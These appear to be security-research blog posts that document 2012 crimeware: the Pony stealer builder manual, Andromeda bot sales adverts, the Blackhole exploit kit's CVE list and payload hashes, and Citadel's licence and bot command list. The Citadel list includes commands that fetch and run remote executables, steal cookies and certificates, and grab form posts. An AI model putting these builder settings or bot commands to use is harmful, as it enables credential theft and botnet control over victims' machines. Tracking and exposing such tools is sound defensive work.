OS - version of Windows.

IP - IP address of the sender.

HWID - a unique user ID does not change with time. In this ID can be found all the reports from a particular computer.

Privileges - with what rights (User / Admin) process was started "Pony.exe".

Architecture - x86/x64 architecture of a microprocessor, which was launched by the process of "Pony.exe".

Version - version of the client "Pony.exe".

Clear the list of reports and FTP / SFTP resets statistics (graphs and text data).

Identical reports with the passwords in the database are not imported when you receive a duplicate, the logs will be notified.

Import records with passwords through "gate.php" takes place in two stages:

The resulting report is imported into the database MySQL. Only when the import was successful in the database will return the gate positive response to the client "Pony.exe" to avoid sending passwords in the following (redundant) domains.

The report is processed (parsed), then found FTP added to the database, and report the status of prescribed "processed."

If the report has received the status "not processed" means either the server is overloaded (exceeded the maximum time the script), or parsing the script left with a critical error. In any case, the report will not be lost.

If the system used by several users, you must go under different accounts, otherwise it will always pop up login window.

After clearing the lists, the data in a MySQL database does not always physically removed (especially logs), so you should periodically run the optimization (compression) tables.

Optimization (compression), MySQL table is best carried out when there is heavy load on the database, ie client "Pony.exe" does not send passwords active.

Builder "PonyBuilder.exe"

Task Builder - Configure and compile the client "Pony.exe", to be progruzhat to infected computers.

Scope of supply:

Folder "masm32" - the compiler Microsoft Macro Assembler (MASM).

Folder "PonySrc" - the source code in MASM client program (grabber) "Pony.exe".

Folder "BuilderSrc" - the source code in Delphi 7 support program-Builder "PonyBuilder.exe".

The file "PonyBuilder.exe" - program-builder for the customer "Pony.exe".

The file "Help.txt" - help file.

The file "build.bat" - a script used by the builders build to compile from source "PonySrc".

The file "Pony.ico" - the icon is attached to the "Pony.exe" at compile time, if the builder select the corresponding option.

The interface is divided into four tabs:

Builder

The text box "list of domains to send passwords" - here you can set a list of URL gates to send passwords. Each line - a separate URL, for example: http://somedomain.com/dir/gate.php You can add an unlimited number of rows (URL), the same URL can be added multiple times. The domain may contain information about the port connection, for example: http://privatedomain.com:8080/gate.php. Https:// protocol is not currently supported.

"Pony.exe" will try to connect and send a report with the passwords on the list, if the data is successfully delivered, the program will exit immediately without attempting to connect to the rest of the URL.

The "Select icon" allows you to set the icon for the compiled file is only supported format *. Ico.

The "New Build" compile file "Pony.exe" to your settings.

Loader

A simple loader (boot files). After gathering passwords from these links (URL) will be loaded and run files. URL given in the same manner as the list of domains to send passwords. In the lower part of the tab you can specify the following options:

Activate the loader - the loader include work, otherwise the files will not load.

Do not run the same files twice - after the successful launch of the downloaded file into the registry will be added to the reference value (hash) of the data file, and then, when re-loading, a duplicate will not run.

Settings

To see all the settings, you need to activate the option "Show advanced settings" in the main menu.

Compress - compress reports using the library aPLib, adds about 5kb to the size of the executable file, packs a good text data before sending it, it is strongly recommended that you use greatly reduces the traffic to the server.

Encrypt - encryption algorithm reports RC4.

Encryption password - a password that is encrypted records, similar to the password must be installed in the server configuration.

Save reports to disk (for debugging) - when you start "Pony.exe", after the passwords have been collected in the same directory where the executable is running, it will create a file "out.bin", a container with a password in this form in which he was sent to the server for further processing (decoding).

Sending blank reports (for statistics) - usually, if no password is found, the client "Pony.exe" personal server will not send, but it is sometimes useful to include this option to get statistics on the number of successful launches "Pony.exe".

Debug mode - removes an interceptor exceptions, be used only for debugging purposes.

Send only new records - if this option is not activated, then the duplicate records with passwords are not sent.

Samoudalenie - running the file "Pony.exe" will be removed after the exit.

Add an icon - an icon to attach the selected file to be compiled.

Packing build with UPX - compress executable "Pony.exe" after compilation.

Number of attempts to send the report - how many times to try to send a report when an unsuccessful transmission, it is recommended to specify a minimum of two attempts.

Build Alternative:

Exe-file - normal executable Windows (*. Exe)

Dll-file - version of the assembly in the form. Dll libraries, it is completely autonomous, to practice you must call from your project API-only function LoadLibrary (), ie URL to send the password and all settings are sewed in myself. Dll file. In the folder DllTest is a simple example of testing, in the same folder to put the file Pony.dll, then run the file DllTest.exe, which in turn calls LoadLibrary () for. Dll library.

In the "Available Modules decoding" can be excluded from the build unneeded passwords decoder, it will reduce the size of the build.

Skin

On this tab, you can choose a favorite skin (skin) Builder.

Starting the Builder from the command line

The following command line arguments Builder:

-PACK_REPORT - compress reports

-ENCRYPT_REPORT - encrypt the records, if encryption password is not specified, the default will be listed "Mesoamerica"

-REPORT_PASSWORD = - password encryption, for example:-REPORT_PASSWORD = Mesoamerica

-SAVE_REPORT - save reports to disk (for debugging)

-ENABLE_DEBUG_MODE - debug mode

-SEND_MODIFIED_ONLY - send only the new records

-SELF_DELETE - enable samoudalenie

-SEND_EMPTY_REPORTS - send a blank report

-ADD_ICON - attach a file icon from Pony.ico

-UPX - Build pack using UPX

-DOMAIN_LIST = - list of domains, each domain must be divided by spec. the symbol \ n, for example:-DOMAIN_LIST = http://host.com/gate.php \ nhttp :/ / host2.com/x/gate.php

-LOADER_LIST = - a list of URL for the loader (it will be automatically activated in the presence of URL), each URL must be divided similarly DOMAIN_LIST

-LOADER_EXECUTE_NEW_FILES_ONLY - do not run the same files twice

-DISABLE_MODULE = - excluding specific module build decoding (all the names of the modules can be seen in the file PonySrc \ FTPClients.asm), for example:-DISABLE_MODULE = MODULE_OPERA

-DLL_MODE - use the assembly in the form of Dll-library

-COLLECT_HTTP - in addition to collect and HTTP / HTTPS passwords

-UPLOAD_RETRIES = N - the number (N) attempts to send a report if no value is specified, the default is 2 attempts

Client "Pony.exe"

The task of "Pony.exe" - to collect passwords from the computer and send them to the server for processing.

Works on all versions of Windows, from Win98, including server. It works in the mode of x86 and x64. The program normally work out when you run as an administrator or user.

Before the proliferation of file it is desirable to clean and kriptanut.

Implemented the instant decryption of stored passwords for the following programs:

System Info

FAR Manager

Total Commander

WS_FTP

CuteFTP

FlashFXP

FileZilla

FTP Commander

BulletProof FTP

SmartFTP

TurboFTP

FFFTP

CoffeeCup FTP / Sitemapper

CoreFTP

FTP Explorer

Frigate3 FTP

SecureFX

UltraFXP

FTPRush

WebSitePublisher

BitKinex

ExpanDrive

ClassicFTP

Fling

SoftX

Directory Opus

FreeFTP / DirectFTP

LeapFTP

WinSCP

32bit FTP

NetDrive

WebDrive

FTP Control

Opera

WiseFTP

FTP Voyager

Firefox

FireFTP

SeaMonkey

Flock

Mozilla

LeechFTP

Odin Secure FTP Expert

WinFTP

FTP Surfer

FTPGetter

ALFTP

Internet Explorer

Dreamweaver

DeluxeFTP

Google Chrome

Chromium / SRWare Iron

ChromePlus

Bromium (Yandex Chrome)

Nichrome

Comodo Dragon

RockMelt

K-Meleon

Epic

Staff-FTP

AceFTP

Global Downloader

FreshFTP

BlazeFTP

NETFile

GoFTP

3D-FTP

Easy FTP

Xftp

FTP Now

Robo-FTP

LinasFTP

Cyberduck

Putty

Notepad + +

CoffeeCup Visual Site Designer

FTPShell

FTPInfo

NexusFile

FastStone Browser

CoolNovo

Note : If anyone has a link to the advert/price for this, please drop a line

Inside Andromeda Bot v2.06 Webpanel / AKA Gamarue - Botnet Control Panel

July 2, 2012, 2:29 pm

≫ Next: CVE-2012-1723 on BH EK

≪ Previous: Inside Pony 1.7 / Fareit C&C - Botnet Control Panel

$

0

0

Bot recognized by Microsoft as : Worm:Win32/Gamarue

Bots/Stats

Blacklist

Add Task

Tasks List

Service

Socks4

Advert on Exploit.in

Описание:
Универсальный модульный бот. На основе этого продукта можно построить ботнет с безгранично разнообразными возможностями. Функционал бота расширяется с помощью системы плагинов, которые могут быть подгружены в нужном количестве и в любое время.

• Не ограниченная по количеству поддержка резервных доменов.
• Протокол обмена данными между ботом и админкой зашифрован с помощью RC4.
• Модульный. Вы сами можете перепрофилировать свой ботнет под Ваши нужды в любое время.
• В системе не агресивен, для установки не требуются права администратора, окно UAC не выскакивает.
• Защищает себя, не подготовленный юзер не сможет удалить бота из системы.
• Обходит фаерволы, не палится в процессах, используется инжект в доверенный процесс.
• Не выбрасывает из себя никаких DLL, не содержит TLS, легко криптуется.
• Не зависимо от успеха установки исходный exe удаляется.
• Работает на линейке от WinXP до Win7 включая x64 системы.
• Малый размер, полностью написан на ассемблере.

Существует две версии бота:
01.* с паблик инжектом, используется QueueUserAPC.
02.* с обходами, отличается от первой пробивом проактивных защит.

Обзор от Ar3s'a

Панель управления:
Написана на PHP в связке с MySQL.

• Определение ботов находящихся за NAT.
• Подсчет статистики по ботнету. Боты онлайн/боты оффлайн/мертвые боты/статистика по странам/статистика по платформам.
• Подсчет количества выполненных/не выполненных задач.
• Можно установить лимит на количество выполнений задания.
• Можно давать задания конкретному боту.
• Распределение задач по странам.
• Удаление всей статы/удаление мертвых ботов из базы.

Скриншоты админ панели:

Bots
Black list
Tasks
Add tasks
Service

Ценники:
01.* - 300$
02.* - 500$
Socks4 - в комплекте
Formgrabber, без инжектов, http/https, все браузеры включая Chrome - 500$
Keylogger - 200$
Ring3 RootKit - 300$

Updates :

Объявление:
В тестовом режиме запущен Jabber бот-ребилдер. В отличии от меня он будет в сети 24 часа в сутки.

• New! У бота можно попросить нерезедентную версию.
• Максимальное количество доменов - 6 (если нужно больше стучим мне)
• Стоимость ребилда снижена до 5$ в независимости от количества доменов.

Все активные клиенты уже занесены в базу бота и всем начислены тестовые 15$, т.е. 3 бесплатных ребилда, стучим за контактами.

--Google Translate--

Ad:
In test mode the Jabber bot rebilder. Unlike me, he will be in the network 24 hours a day.

• New! At the bot can ask nerezedentnuyu version.
• Maximum number of domains - 6 (if you need more knock me)
• Cost rebilda reduced to $ 5, regardless of the number of domains.

All active clients are already listed in the base of the bot and all accrued test $ 15, ie 3 free rebilda, knocking over pins.



Adverted on Uber Forums as :

Description:
Versatile modular bot. Based on this product, you can build a botnet with a limitless variety of possibilities. The functional bot expanded with the help of plug-ins that can be loaded in the right quantity and at any time.
Not limited by the number of backup support for domains.
The protocol for data exchange between the bot and the admin panel is encrypted using RC4.
Modular. You can convert your botnet to your needs at any time.
The system does not agresiven for installation does not require administrator rights, UAC does not pop up window.
Protect yourself, is not prepared by the user will not be able to remove the bot from the system.
Traverses firewalls without palitsya in the processes used to inject a trusted process.
Do not throw yourself out of any DLL, does not include TLS, it is easy to crypt.
Regardless of the success of the original installation exe is removed.
Works on the line from WinXP to Win7 x64 systems including.
Small size, written entirely in assembly language.
There are two versions of the bot:
01 *. Of Public injector is used QueueUserAPC.
02 *. To bypass differs from the first punching proactive protection.



Control Panel:
Written in PHP in conjunction with MySQL.
Determination of bots behind NAT.
Counting statistics for the botnet. Bots are online / offline bots / dead bots / statistics by country / statistics on the platforms.
Counting the number of completed / not completed tasks.
You can set a limit on the number of executions of the task.
You can make the job a particular bot.
The distribution of tasks across countries.
Removal of the entire article / remove bots from the dead base.
Screenshots of the admin panel:

Bots
Black list
Tasks
Add tasks
Service

Price lists:
01. * - $ 300
02. * - $ 500
Socks4 - complete
Formgrabber, without the injector, http / https, all browsers including Chrome - $ 500
Keylogger - $ 200
Ring3 RootKit - $ 300

We accept:
Liberty Reserve (preferred)
---------------------

пиндосы всегда будут на один шаг позади

Мой бот, мне и правилами управлять. В связи с тем, что на пиндоских форумах начали активно барыжеть моим ботом (уже было отозвано несколько лицензий). Я принял решение открыть продажи для англоговорящих, но с одним условием, пиндосы всегда будут на один шаг позади, т.е. след. обновка (версия *.07) будет доступна только русским и пиндосы получат версию *.07 только после выхода версии *.08 и т.д.

--Google Translate--

My boat, my rules, and manage. Due to the fact that the forums have been actively pindoskih baryzhet my boat (it was already revoked several licenses). I decided to open sales for English-speaking, but with one condition, Pindos will always be one step behind, that is, trail. new thing (version * .07) will be available only in Russian and Pindos get version .07 * after * the release of version .08, etc.

CVE-2012-1723 on BH EK

July 5, 2012, 12:54 pm

≫ Next: Gimemo finally targeting USA with Camera Feature too

≪ Previous: Inside Andromeda Bot v2.06 Webpanel / AKA Gamarue - Botnet Control Panel

$

0

0

As seen on Brian Krebs' blog :

Some BH EK are now taking advantage of CVE-2012-1723
Checked on a reverse proxy of the BH EK that was already taking avantage of CVE-2012-1889
Windows XP with IE8 up to date and Java 1.7u4

> Update your java...fast.

Gimemo finally targeting USA with Camera Feature too

July 21, 2012, 3:48 am

≫ Next: Inside Blackhole Exploits Kit v1.2.4 - Exploit Kit Control Panel

≪ Previous: CVE-2012-1723 on BH EK

$

0

0

Two moves for Gimemo :

 - Camera Feature (as : Reveton and Tobfy)

 - USA targeted (impersonnating FBI and Moneypack payment as Reveton)

See :

Gimemo - July 2012 - FBI + Camera for USA citizens

It seems camera feature is only available for USA right now...but on its way for germans too.

Gimemo - July 2012 - New design - Camera soon...

We can expect to see this new clean design in all other countries soon.

As usual you'll found all known ransom landings for Gimemo on botnets.fr

Md5 for Gimemo enthousiasts : 60cfc056f9160976c4f325a23147f823

---

Inside Blackhole Exploits Kit v1.2.4 - Exploit Kit Control Panel

July 22, 2012, 2:42 pm

≫ Next: Inside Citadel 1.3.4.5 C&C & Builder - Botnet Control Panel

≪ Previous: Gimemo finally targeting USA with Camera Feature too

$

0

0

Paunch Notification on Exploit.In about BH EK 1.2.4

Original text of the advert :
----------------------------------------

вышла версия 1.2.4

из новинок:
+ добавлен новый java эксплойт CVE-2012-1723 значительно прибавляющий в пробиве
+ добавлен новый flash эксплойт CVE-2011-2110

всех прошу за обновкой
----------------------------------------

Google Translation :
----------------------------------------

released version 1.2.4

of new products:
+ Added new java exploit CVE-2012-1723 add much to the punching
+ Added a new flash exploit CVE-2011-2110

All I ask for new clothes
----------------------------------------

BH EK - login Screen (English and Russian + PDA template)

BH EK - Statistics

BH EK - Threads (Note : Data has been intercepted and modified)

BH EK - Files (Note : Data intercepted and modified)

BH EK - Security

BH EK - Preferences (Note : Data has been intercepted and modified)

Known exploited vulnerabilities (feel free to comment if some are missing, see at the end for sources) :

CVE-2006-0003 - Unspecified vulnerability in the RDS.Dataspace ActiveX control in Microsoft Data Access Components (MDAC)
CVE-2007-5659 - Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier
CVE-2008-2992 - Adobe Reader "util.printf" Vulnerability
CVE-2009-0927 - Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 (multiple versions) allows remote attackers to execute arbitrary code
CVE-2009-1671 - Java buffer overflows in the Deployment Toolkit ActiveX control in "deploytk.dll"
CVE-2009-4324 - Adobe Reader and Adobe Acrobat "util.printd" Vulnerability
CVE-2010-0188 - Adobe Acrobat Bundled Libtiff Integer Overflow Vulnerability
CVE-2010-0840 - Sun Java JRE Trusted Methods Chaining Remote Code Execution Vulnerability
CVE-2010-0842 - Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability
CVE-2010-0886 - Vulnerability in the Java Deployment Toolkit component in Oracle Java SE
CVE-2010-1423 - Java argument injection vulnerability in the URI handler in Java NPAPI plugin
CVE-2010-1885 - Microsoft Help Center URL Validation Vulnerability
CVE-2010-3552 - Sun Java Runtime New Plugin docbase Buffer Overflow (aka "Java Skyline exploit")
CVE-2010-4452 - Sun Java Applet2ClassLoader Remote Code Execution Exploit
CVE-2011-3544 - Vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier

SpiderLabs talked about
CVE-2011-0611 - Adobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and Solaris and 10.2.156.12 and earlier on Android; Adobe AIR before 2.6.19140; and Authplay.dll

In march with BH EK 1.2.3 :
CVE-2012-0507 - Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and 5.0 Update 33 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Concurrency. (see video & Article from D. Harley at the end of this post)

And now :
CVE-2012-1723 - Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot. (see video & Article from A. Matrosov at the end of this post)
CVE-2011-2110 - Adobe Flash Player Unspecified Memory Corruption Vulnerability

Note Sophos has reported having seen on the thread of a BH EK :
CVE-2012-1889 Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 accesses uninitialized memory locations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

It's maybe not obvious to all readers but in fact BH EK is changing everyday to play his part in the "Poke A Mole" game with Antivirus

Picture S

 (many other moving factors, payload packing (to avoid getting caught on 4), reverse proxies and domains rotation (to avoid blacklisting and fail on 2), JS obfuscation (at many stage of the attack, on chained redirection (step 2) and in the Blackhole (step 3) )

The Java Payload (stage 3 on Picture S) is moving on a daily basis . Here is what i found on a BH EK between June 21 and July 12 :

Ners.jar 7/12/2012 14h 5492569df2b1c63e2b97e443a9ce5cd6

Fiord.jar 7/12/2012 7h 3606d5f73ee0c3c2e1f1300c775b0de4

Korm.jar 7/11/2012 11h 89d7a711dd4df507f204a5c123c90add

Soo.jar 7/6/2012 13h db8cdc979b89134037d9b82c069d7b1c

Setl.jar 7/6/2012 8h 34d8df43c1e12778987b11e29df90dce

Forq.jar 7/5/2012 19h f00ca5d6ac7e8fb86b1b2cfc344d0b6c

Fwin.jar 7/5/2012 7h 9c682052f9a01c0e3e068c4fad9b42e5

Utor.jar 7/4/2012 11h f0a8b6c30c3cf588b406085dcfaa5bd9

Torm.jar 7/4/2012 8h 8c7198a479f58da0ebf71089848a8474

Ktu.jar 7/3/2012 15h 25c58b6a3a2bd9cf7ef559629e339b6d

Werd.jar 7/3/2012 10h fb0d62af177adf6db5ae323ff610663a

Ryp.jar 7/2/2012 15h e3639fde6ddf7fd0182fff9757143ff2

Sfer.jar 7/2/2012 10h 40b935f4d94a833970ab15d97cc701d2

Fok.jar 6/30/2012 8h 72cd5d44a6e48bc2145cf16511186aaa

Raik.jar 6/29/2012 9h 21005b50e943b5ba9fd1293ce91712f0

Lor.jar 6/29/2012 7h 3582a8b2f5490919f8bc3f690bd128bb

Story.jar 6/28/2012 10h c1be79c022ddcc603425e505f4a277f0

Look.jar 6/28/2012 7h dc2696e1ba3066b438e80d0c1cd678b4

Ruben.jar 6/27/2012 21h 9a6588c63e5df579fbf07db07529d694

Tip.jar 6/27/2012 21h bcd41b287bcbdae48192a79acbe1974d

Short.jar 6/27/2012 21h b5c7cb36b8c12ceaddb3ad2c74058bb6

Poly.jar 6/26/2012 17h f1debc7bd7b454463a060c06af0810b2

Tyke.jar 6/26/2012 11h 65d41d0088db28a528d9bcdcaae8f583

Kort.jar 6/25/2012 17h d024fbdc31ffb946982b0f2858205b15

Tool.jar 6/23/2012 8h 2741b191ca5fb3e7ec7e984a6006f03c

Tom.jar 6/22/2012 13h 1556fda12bb727321c83c4fa058e0dad

Kellt.jar 6/22/2012 10h bc61e825fb695e76ac7dd5b93b12d14b

Kelt.jar 6/22/2012 7h bc61e825fb695e76ac7dd5b93b12d14b

Trop.jar 6/21/2012 16h d33a721138dd69941c5768420abec45a

Ruel.jar 6/21/2012 15h 151084c92ef8f937aeacdadeb52fefa8

Sop.jar 6/21/2012 9h b5c7cb36b8c12ceaddb3ad2c74058bb6

Half.jar 6/21/2012 7h caa0bce0418540a39fbe1a12d6c6d116

Com.jar 6/18/2012 10h d439b9fe666d869dc1d394928f963fb1

Note that when they appear it's often a 1 or 2/42 on Virustotal meaning that stage 3 of the Attack will likely work if your software (browser plugins) are not up to date.


If you want to read more about recent move of Blackhole Exploits Kit look this (newer first) :

The rise of a new Java vulnerability - CVE-2012-1723
Jeong Wook - Microsoft Malware Protection Center - 1st Aug 2012

An Examination of Java Vulnerability CVE-2012-1723
Masaki Suenaga - Symantec - 27 Jul 2012

The Rise of the “Blackhole” Exploit Kit: The Importance of Keeping All Software Up To Date
Tim Rains - Microsoft Security Blog - 19 Jul 2012

What did the Java applet say to the SWF? Don't leave me alone in this Blackholeee!
SpiderLabs - 16 Jul 2012

Java the Hutt meets CVE-2012-1723: the Evil Empire strikes back
Aleksandr Matrosov - ESET Threat Blog - 10 Jul 2012

New Java Exploit to Debut in BlackHole Exploit Kits
Brian Krebs - KrebsOnSecurity - 5 Jul 2012

Wham Bam, the Cutwail/Blackhole Combo
Phil Hay - SpiderLabs - 2 Jul 2012

Zero-day XML Core Services vulnerability included in Blackhole exploit kit
Fraser Howard - NakedSecurity (Sophos) - 29 Jun 2012

Java CVE-2012-0507 / CVE-2011-3521
Mila - Contagio - 31 Mar 2012

Blackhole, CVE-2012-0507 and Carberp
David Harley - ESET Threat Blog - 30 Mar 2012

More about CVEs and EK :
An Overview of Exploit Packs (Update 16)
Mila - Contagio - 3 Avr 2012 (Based on François Paget's An Overview of Exploit Packs (McAfee - 28 May 2010) )

Inside Citadel 1.3.4.5 C&C & Builder - Botnet Control Panel

July 29, 2012, 6:04 am

≫ Next: Update to Blackhole Exploit Kits: v1.2.5

≪ Previous: Inside Blackhole Exploits Kit v1.2.4 - Exploit Kit Control Panel

$

0

0

Citadel Panel v1.3.4.5 :

Citadel - Login Screen

Citadel - Summary

Citadel - OS

Citadel - Installed Software - Softwares

Citadel - Installed Software - Firewall

Citadel - Installed Software - Antivirus

Citadel - Bots

Citadel - Full information about bot

Citadel - Scripts

Citadel - New Script

Citadel - VNC

Citadel - Search in Datase

Citadel - Context menu available on each bot mention

Citadel - Bot - All information

Citadel - Type of Report

Citadel - Report - HTTP request

Citadel - Report - Grabbed Data (FTP Client)

Citadel - Report - Installed Software

Citadel - Video Viewer

Citadel - French Bank vs Video Viewer

Citadel - Video Player - Activated on a French Banque

Citadel - Video Player - French Banque virtual Keyboard - Pass being recorded

Citadel - Search in Files

Citadel - CMD Parser

Citadel - Jabber Notifier

Citadel - Informations

Citadel - Options

Citadel - User

Citadel - Users

Citadel  v1.3.4.5 Builder:

Citadel - Builder Tree

Citadel - builder folder

Citadel v1.3.4.5 Builder - 1 client = 1 builder

Licence Agreement - Original (Pastebin)

-------------------------------------------------------------------------------------------

Лицензионное соглашение Citadel Software.

1. Приобретая продукт Citadel, вся ответственность за его использование лежит на вас. Команда разработчиков Citadel Software не несет ответственности за любые неправомерные действия с использованием данного ПО. 

2. Команда разработчиков Citadel Software категорически не поддерживают использование данного продукта на территории СНГ, продукт не будет работать на системах, с русскоязычной и украинской раскладкой.

3. После согласования условий в момент  покупки и передачи денежных средств разработчику, данные средства не могут быть более возвращены клиенту обратно.

4. Перед покупкой, клиент обязуется ознакомиться с полным описанием продукта и его функционалом, при имеющихся вопросах, обратиться в тех.поддержку. 

5. Клиент обязуетеся использовать персональный билдер на 1 компьютере (виртуальной машине) и не передавать его третьим лицам, персональный билдер имеет уникальную сигнатуру, принадлежащую только вам. Все остальные вопросы по данному вопросу оговариваются в личной беседе. Барыжнечество/перепродажа без согласия автора наказуемы black list'ом и лишением лицензии.

6. Клиент обязуетеся ежемесячно вносить арендную плату, установленную разработчиками. Максимальный срок просрочки - 7 дней. Если сумма аренды не была внесена, ваш аккаунт блокируется в Citadel CRM и вы лишаетесь всех дальнейших обновлений продукта на 1-2 месяца (решается индвидуально).

7. Разработчики обязаны выдать клиенту обновленный билдер ежемесячно, если клиентом была уплачена арендная плата. Данный билдер включает: плановую чистку продукта и необходимые багфиксы.

8. Любые вопросы/замеченые ошибки в софте/недочеты/идеи, принимаются исключительно через ticket-панель в вашем персональном аккаунте Citadel CRM. Данная ticket-панель гарантирует вам оперативный ответ на возникший запрос.

9. Клиенту выдается аккаунт в системе Citadel CRM, данный аккаунт принадлежит исключительно клиенту и передача его третьим лицам запрещена.

10. Клиент имеет право передать или продать свою лицензию на продукт, предварительно согласовав свои действия с разработчиками.

11. Команда разработчиков Citadel Software не несет ответственности за обнаружение продукта в различных антивирусных системах, но в свою очередь старается этого недопускать и делать все необходимое для избежания этого.

12. Все операции с денежными средствами осуществляются исключительно через платежную систему Liberty Reserve, другие платежные инструменты недопускаются к использованию. Оперативно обменять средства из различных платежных систем, можно на сайте mmgp.ru

13. Дополнительные модули для продукта Citadel можно приобрести в любое время.

14. В случае неразрешения споров по поводу корректной работы функционала софта, клиент обязуется предоставить TeamViewer доступ к ПК где установлен тестовой бот или вебсервер support'у, в противном случае support не сможет оказать помощь в данном вопросе.

15. В задачи тех.поддержки не входит установка и настройка софта на сервере/серверах клиента, клиент обязуется сам установить или настроить необходимое ПО на сервере, либо привлечь соответствующих специалистов, а также протестировать корректную работу ПО. Установка и настройка продукта тех.поддержкой осуществляется за доп.плату.

16. Citadel не продается англоязычной публике (амеры, румыны, азиаты, любой англоговорящий человек), запрещено быть представителями данных субъектов и обслуживать их интересы(читать: быть посредником), за несоблюдение данного правила следует лишение лицензии. Only for Russians.

17. Запрещено организовывать сервисы по продаже разовых "билдов" Citadel.

-------------------------------------------------------------------------------------------

Licence Agreement - Google Translate (Pastebin)

-------------------------------------------------------------------------------------------

License Agreement Citadel Software.

A. By purchasing a product Citadel, the entire responsibility for its use rests with you. The development team Citadel Software is not responsible for any illegal actions by using the software.

Two. The development team Citadel Software strongly support the use of this product in the CIS, the product will not work on systems with the Russian and Ukrainian keyboard layout.

Three. After agreeing on the conditions at the time of purchase and transfer of funds the developer, the funds could not be more than returned to the client back.

4. Before you buy, the customer agrees to read the full description of the product and its functionality, if available questions, contact the Supporter.

Five. Customer agree to use a personal computer builder on a (virtual machine) and do not pass it on to any third party, personal builder has a unique signature that belongs to you. All other questions on this matter are specified in a personal conversation. Baryzhnechestvo / resale without the consent of the author and punishable by deprivation of black list'om license.

6. Customer agree to pay the rent on a monthly basis, established developers. The maximum period of delay - 7 days. If the amount of rent was not paid, your account is blocked in the Citadel CRM, and you lose all the future updates of the product for 1-2 months (indvidualno solved).

7. Developers must give the client an updated monthly builder, if the client was paid the rent. This builder includes routine cleaning of the product and the necessary bug fixes.

Eight. Any questions / errors found in software / bugs / ideas are accepted only through the ticket-bar in your personal account Citadel CRM. This ticket-panel guarantees you prompt response to a query has arisen.

9. Customer account is given in the Citadel CRM, this account belongs exclusively to the client and transfer it to third parties is prohibited.

10. The client has the right to transfer or sell their product license, pre-coordinate with the developers.

11. The development team Citadel Software is not responsible for the detection of anti-virus product in different systems, but in turn this nedopuskat and tries to do everything necessary to avoid that.

12. All operations are carried out with funds solely through the payment system Liberty Reserve, other payment instruments nedopuskayutsya to use. Promptly exchange funds from the various payment systems, please visit mmgp.ru

13. Additional modules for the Citadel of the product can be purchased at any time.

14. In the case of unresolved disputes about the correct operation of software functionality, the client agrees to provide TeamViewer access to a PC where you installed the test boat, or webserver support'u, otherwise the support will not be able to help in this matter.

15. The tasks of the Help Desk does not include installing and configuring software on a server / client server, the client agrees to itself install or configure the necessary software on the server, or to draw appropriate specialists, as well as to test the correct operation of software. Installing and configuring the product Technical support is for extra charge.

16. Citadel does not sell English-language public (amers, Romanians, Asians, all English speaking people), it is forbidden to be representatives of data subjects and to serve their interests (read: a mediator), for non-compliance of the rules should deprive the license. Only for Russians.

17. It is forbidden to organize services for the sale of one-off "builds" Citadel.

-------------------------------------------------------------------------------------------

Commands.txt - Original (Pastebin) 

-------------------------------------------------------------------------------------------

Работы с OC.

os_shutdown - Выключить компьютер

os_reboot - Перегрузить компьютер

Работа с ботом.

bot_uninstall - Выгрузить бота с компьютера

bot_update [url] - Обновить конфигурацию бота

bot_bc_add [service] [ip] [port] - Создать бек-коннект соединение с ботом

bot_bc_remove [service] [ip] [port] - Удалить бек-коннект соеднение с ботом

bot_httpinject_disable [url_mask] - Отключить выполнение инжекта у бота

bot_httpinject_enable [url_mask] - Включить выполнение инжекта у бота

Работа с пользователем.

user_destroy - Убить ОСь бота

user_logoff - Завершить сеанс пользователя бота

user_execute [url] - Запустить исполняемый файл на компьютере бота

user_cookies_get - Получить куки с компьютера бота

user_cookies_remove - Удалить куки с компьютера бота

user_certs_get - Получить сертификаты с компьютера бота

user_certs_remove - Удалить сертификаты с компьютера бота

user_homepage_set [url] - Задать URL как домашнюю страницу боту

user_flashplayer_get - Получить SOL файлы с компьютера бота

user_flashplayer_remove - Удалить SOL файлы с компьютера бота

dns_filter_add <host> <ip> - добавление маски для редиректа

dns_filter_add *microsoft.com 127.0.0.1  - добавление маски для редиректа

dns_filter_remove *microsoft.com - удаление маски для редиректа

dns_filter_remove <host>

при удалении должен быть указан такой же хост как и при добавлении

 url_open http://www.host.com

 Открываем на компьютере холдера произвольную заданную страницу дефлотовым браузером на полный экран, идеально для рекламы чего-либо

 user_execute http://www.citadel-host.com/citadel_folder/file.php|file=exe.exe

 Команда работает без кавычек, начиная с версии 1.2.4.0, для выполнения нужно залить нужный ехе файл в директорию files на вашей цитадели и указать его в конце строчки.

- У нас добавилась новая опция в секции entry "StaticConfig"

  disable_cookies 0

  

  1 выключает отсылку cookies на сервер вообще.

  0 включает отсылку cookies на сервер.

- Теперь по поводу cекции WebFilters

Два новых параметра: P и G.

Параметр P указанным перед ссылкой, указывает о записи только POST запросов(все другие игнорируются) с этой ссылки.

Параметр G указывает о записи только GET запросов (все другие игнорируются) с заданной ссылки.

Параметр ! игнорирует заданные запросы по маске и не пропускает их в логи.

Examples:

"Phttp://*.com/" - грабит только все пост-запросы в http://. https:// игнорирует

"Ghttp://*.eu/*banking*" - грабит только все GET запросы по заданной маске.

"Phttps://*.com/" - грабит только https://-post запросы

"!http://*.com/*.jpg" - игнор jpg картинок.

- Получение информации об установленном ПО (список - компания|продукт|версия) на компьютере: info_get_software

- Получение информации об установленном антивирусе на компьютере: info_get_antivirus

- Получение информации об установленном фаерволе на компьютере: info_get_firewall

-------------------------------------------------------------------------------------------

Comands.txt -  Google Translate - (Pastebin)

-------------------------------------------------------------------------------------------

Work with the OC.

os_shutdown - Shut down the computer

os_reboot - Reboot the computer

Working with the bot.

bot_uninstall - Unload boat from your computer

bot_update [url] - Update the configuration of the bot

bot_bc_add [service] [ip] [port] - Create a back-Connect connection to the bot

bot_bc_remove [service] [ip] [port] - Remove back-soednenie connection with the bot

bot_httpinject_disable [url_mask] - Turn off injection produce a bot

